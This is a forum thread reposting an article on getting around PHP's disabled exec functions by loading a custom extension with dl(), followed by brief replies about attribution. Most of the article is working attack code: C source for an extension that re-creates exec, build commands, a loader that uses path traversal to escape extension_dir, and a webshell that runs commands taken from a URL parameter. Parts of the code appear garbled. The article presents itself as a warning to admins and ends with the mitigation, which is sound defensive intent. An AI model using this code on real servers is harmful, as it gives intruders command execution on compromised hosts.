[Article] Bypassing disabled exec functions in PHP using the dl function

Discussion in 'Forum for discussion of ANTICHAT' started by Solide Snake, 19 May 2008.

  1. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    390
    Likes Received:
    836
    Reputations:
    69
    Bypassing disabled exec functions in PHP using the dl function


    The reason I wrote this was to convince admins to disable the dl function that's built-in PHP. This article will be in regards to an admin that doesn't run PHP in Safemode. This is because when safemode is enabled various restrictions are activated, one of these restrictions is the disabling of the dl function.

    Admins that don't run with safemode on tend to take advantage of the disable_functions directive.
    The PHP manual states
    QUOTE
    disable_functions string

    This directive allows you to disable certain functions for security reasons. It takes on a comma-delimited list of function names


    This directive is commonly used to disable any functions that allow the execution of system commands.

    Some for example are:
    1. exec - "Execute an external program"
    2. passthru - "Execute an external program and display raw output"
    3. system - "Execute an external program and display the output"
    4. popen - "Opens a pipe to a process executed by forking the command given by command"
    5. pcntl_exec - "Executes specified program in current process space"
    6. shell_exec - "Execute command via shell and return the complete output as a string"
    7. proc_open - "Execute a command and open file pointers for input/output"

    If you'd like to read on some commonly disabled functions you may be interested in an article by Damien Seguy titled "PHP configuration statistics".


    Let me give you a scenario, in the scenario an admin has disabled all of the PHP functions used to execute system commands.
    The admin has also disabled means of executing code through cgi-bin along with SSI by disabling mod_include.
    The attacker has gained access to the web server via a vulnerability in a web script and has been able to upload a webshell to the server.

    (For those who don't know, a webshell is a web application or script that allows handling basic system functions such as creating/editing/deleting/uploading files and if the system allows executing system commands through a web interface.)

    In this situation the attacker cannot use the webshell to execute commands since the admin has disabled that functionality. This does not how ever stop the attacker from uploading additional files, that is if the file permissions allow it.
    In this scenario the file permissions were carelessly handled and the attacker had no problems with creating/uploading new files.
    For the most part the battle has been lost since the attacker has already been able to gain this much access, but this isn't what the article is about.

    When the admin was configuring the box he/she overlooked the dl function and didn't disable it since there was no mention of being able to execute system commands.
    The dl function is used to loads PHP extensions when a script is executed.

    (PHP extensions are written in C/C++ and are used to give PHP more functionality.)

    The attacker notices the function isn't disabled and sees potential and decides to create a PHP extension.
    The attacker checks the version of PHP using a small script

    CODE:

    PHP:
    <?php echo 'PHP Version is '.PHP_VERSION?>
    (PHP_VERSION is a predefined constant that contains the version number of PHP.)

    The attacker notes the version and downloads the tarball from the PHP website, in this scenario the version is older than the current release so the attacker has to go to the archive.

    Next he extracts the source and compiles and installs the version of PHP on his own box.

    Now it's time to create the extension
    The attacker reads up on creating PHP extensions from the PHP site.
    After reading through the documentation and creating some extensions of his own he decides to look at the PHP code base since the function he's after is already created.

    The function that will be duplicated will be the exec function
    in the code base it's located in ext/standard/exec.c

    The relevant parts are implemented into a new extension of its own.

    The files for the separate extension end up as below:


    bypass.c

    PHP:
    /*
        +----------------------------------------------------------------------+
        | Copyright (c) 1997-2003 The PHP Group                                |
        +----------------------------------------------------------------------+
        | This source file is subject to version 2.02 of the PHP license,      |
        | that is bundled with this package in the file LICENSE, and is        |
        | available at through the world-wide-web at                           |
        | http://www.php.net/license/2_02.txt.                                 |
        | If you did not receive a copy of the PHP license and are unable to   |
        | obtain it through the world-wide-web, please send a note to          |
        | license@php.net so we can mail you a copy immediately.               |
        +----------------------------------------------------------------------+
    */


    #ifdef HAVE_CONFIG_H
    #include "config.h"
    #endif

    #include "php.h"
    #include "php_bypass.h"

    static function_entry bypass_functions[] = {
         
    PHP_FE(bypass_execNULL)
         {
    NULLNULLNULL}
    };

    zend_module_entry bypass_module_entry = {
    #if ZEND_MODULE_API_NO >= 20010901
         
    STANDARD_MODULE_HEADER,
    #endif
         
    PHP_BYPASS_EXTNAME,
         
    bypass_functions,
         
    NULL,
         
    NULL,
         
    NULL,
         
    NULL,
         
    NULL,
    #if ZEND_MODULE_API_NO >= 20010901
         
    PHP_BYPASS_VERSION,
    #endif
         
    STANDARD_MODULE_PROPERTIES
    };

    #ifdef COMPILE_DL_BYPASS
    ZEND_GET_MODULE(bypass)
    #endif


    PHP_FUNCTION(bypass_exec){
       
    FILE *in;
       
    int readbytestotal_readbytes=0allocated_space;
       
    pval **cmd;
       
    char *ret;

       if (
    ZEND_NUM_ARGS()!=|| zend_get_parameters_ex(1, &cmd)==FAILURE) {
         
    WRONG_PARAM_COUNT;
       }

       
    convert_to_string_ex(cmd);
    #ifdef PHP_WIN32
       
    if ((in=VCWD_POPEN(Z_STRVAL_PP(cmd), "rt"))==NULL) {
    #else
       
    if ((in=VCWD_POPEN(Z_STRVAL_PP(cmd), "r"))==NULL) {
    #endif
         
    php_error_docref(NULL TSRMLS_CCE_WARNING"Unable to execute '%s'"Z_STRVAL_PP(cmd));
         
    RETURN_FALSE;
       }

       
    allocated_space EXEC_INPUT_BUF;
       
    ret = (char *) emalloc(allocated_space);

       while (
    1) {
         
    readbytes fread(ret+total_readbytes1EXEC_INPUT_BUFin);
         if (
    readbytes<=0) {
           break;
         }

         
    total_readbytes += readbytes;
         
    allocated_space total_readbytes+EXEC_INPUT_BUF;
         
    ret = (char *) erealloc(retallocated_space);
       }

       
    pclose(in);

       
    RETVAL_STRINGL(rettotal_readbytes0);
       
    Z_STRVAL_P(return_value)[total_readbytes] = '\';
    }

    php_bypass.h

    PHP:
    #ifndef PHP_BYPASS_H
    #define PHP_BYPASS_H 1

    #define PHP_BYPASS_VERSION "1.0"
    #define PHP_BYPASS_EXTNAME "bypass"

    PHP_FUNCTION(bypass_exec);

    extern zend_module_entry bypass_module_entry;
    #define phpext_bypass_ptr &bypass_module_entry

    #endif

    config.m4

    PHP:
    HP_ARG_ENABLE(bypasswhether to enable bypass support,
    [ --
    enable-bypass   Enable bypass support])

    if 
    test "$PHP_BYPASS"yes"then
       AC_DEFINE
    (HAVE_BYPASS1, [Whether you have bypass])
       
    PHP_NEW_EXTENSION(bypassbypass.c$ext_shared)
    fi

    Once the files are created it's time to build the PHP extension.

    PHP:
    phpize
    ./configure
    make
    Once this is done the compiled extension will be located in the modules sub directory with the filename bypass.so.
    The file is copied to a safe place, now the following commands are executed to clean up the newly created files.

    PHP:
    make clean
    phpize 
    --clean
    Now the attacker uploads the newly created extension to the victim host.

    (NOTE: Major releases of PHP use different API versions, in order for you to be able to compile the extension on one host and upload it to another the API versions must match. This is why initially the same PHP version was installed on the attackers box. )

    In order to load an extension with the dl function the extension needs to be in the the extension directory which is defined by the extension_dir directive.
    This can be a problem since it's less likely for the attacker to have write permissions in this directory, there is however a way to get passed this.
    This problem has been discussed by developers on the dl function page within the notes section.

    The concept that was discussed is to use a relative path from the defined extension directory.
    For example if the extension directory was set to /usr/php/extensions and you'd like to load bypass.so in the current web directory /home/example.com/html you would do as follows:

    PHP:
    <?php

    dl
    ('../../../home/example.com/html/bypass.so');

    ?>
    This will get passed the need to have the extension in the defined extension directory.

    There is also an automated way so you won't have to change the relative path for different hosts, this code was created by endofyourself [at] yahoo [dot] com and improved apon later on by mag_2000 [at] front [dot] ru

    There was one minor problem with the function, on some hosts the extension directory is set to "./" this function didn't take into account if the extension directory was set to a relative path, the fix for this is too use the realpath function.

    The final script used to load the extension and execute system commands to bypass the disabled functions is as follows:

    PHP:
    <?php

    function dl_local$extensionFile ) {
       if(!(bool)
    ini_get('enable_dl')
        ||(bool)
    ini_get('safe_mode')){
          die(
    'Loading extensions is not permitted.');
       }

       if(!
    file_exists($extensionFile)){
         die(
    'File '.$extensionFile.' does not exist.');
       }

       if(!
    is_executable($extensionFile)){
         die(
    'File '.$extensionFile.' is not executable. ( chmod +x '.$extensionFile.' )');
       }

       
    $currentDir getcwd().'/';
       
    $currentExtPath realpath(ini_get('extension_dir'));

       
    $subDirs preg_match_all("/\//",$currentExtPath ,$matches);
       unset(
    $matches);

       if(!(bool)
    $subDirs){
         die(
    'Could not determine a valid extension path [extension_dir]');
       }

       
    $extPathLastChar=strlen($currentExtPath )-1;

       if(
    $extPathLastChar==strrpos($currentExtPath,'/')){
         
    $subDirs--;}$backDirStr '';

         for(
    $i 1$i <= $subDirs$i++){
           
    $backDirStr .='..';
           if(
    $i != $subDirs){
             
    $backDirStr .='/';
           }
         }

         
    $finalExtPath $backDirStr.$currentDir.$extensionFile;
         if(!
    dl($finalExtPath)){
           die();
         }


         
    $loadedExtensions get_loaded_extensions();
         
    $thisExtName $loadedExtensions[sizeof($loadedExtensions)-1];
         return 
    $thisExtName;
    }

    @
    ini_set ('display_errors','1');
    error_reporting(E_ALL);

    dl_local('bypass.so');

    if(@
    $_GET['cmd']){
       
    $output bypass_exec($_GET['cmd']);
       echo 
    '<pre>'.$output.'</pre>';
    }
    ?>
    Alls the attacker has to do now to execute commands is call the URL to the script along with a cmd variable with the desired command.

    example:

    Code:
    http://www.example.com/script.php?cmd=ls
    In order to disable the dl function edit php.ini and add it to the disable_functions directive.

    (c)
     
    6 people like this.
  2. Дрэгги

    Дрэгги Elder - Старейшина

    Joined:
    26 Aug 2005
    Messages:
    284
    Likes Received:
    396
    Reputations:
    182
    Is this your own article? Or a translation of an article written by someone else from antichat? Or an article taken off some site? In any case you should provide link/copyright/note pointing out its origin.
     
  3. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,005
    Likes Received:
    444
    Reputations:
    94
    It's provided:
    http://www.datastronghold.com/security-articles/hacking-articles/bypassing-disabled-exec-functions-in-php-using-the-dl-function.html
     
  4. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    390
    Likes Received:
    836
    Reputations:
    69
    (с) can be found in the right corner at the end of article.
     
    #4 Solide Snake, 19 May 2008
    Last edited: 19 May 2008
  5. Дрэгги

    Дрэгги Elder - Старейшина

    Joined:
    26 Aug 2005
    Messages:
    284
    Likes Received:
    396
    Reputations:
    182
    That's some new way of displaying copyright, well maybe it'll do this way then.
     
    2 people like this.
Loading...
Similar Threads - Article Bypassing disabled
  1. neM3Sis
    Replies:
    6
    Views:
    4,319